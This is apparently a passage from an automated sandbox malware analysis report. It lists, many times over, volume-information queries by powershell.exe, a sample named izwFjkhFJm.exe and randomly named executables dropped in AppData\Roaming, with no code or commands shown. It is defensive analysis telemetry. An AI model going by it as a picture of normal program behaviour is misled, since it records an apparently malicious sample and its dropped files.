Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Users\user\Desktop\izwFjkhFJm.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll | VolumeInformation
